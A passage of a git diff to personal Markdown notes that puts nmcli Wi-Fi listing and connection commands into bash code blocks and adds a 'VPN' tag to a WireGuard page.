-> nmcli device wifi list +```bash +nmcli device wifi list +``` Now to connect. -> nmcli device wifi connect [SSID] [your password] [wifi password] +```bash +nmcli device wifi connect [SSID] [your password] [wifi password] +``` Alternatively, you can use -> nmcli -ask device wifi connect [SSID] +```bash +nmcli -ask device wifi connect [SSID] +``` And it'll ask for your password, so you're not typing it in in full view. diff --git a/networking/wireguard.md b/networking/wireguard.md index 715394f..7d58910 100644 --- a/networking/wireguard.md +++ b/networking/wireguard.md @@ -1,6 +1,6 @@ --- title: "wireguard" -tags: [ "Documentation", "Networking" ] +tags: [ "Documentation", "Networking", "VPN" ] ---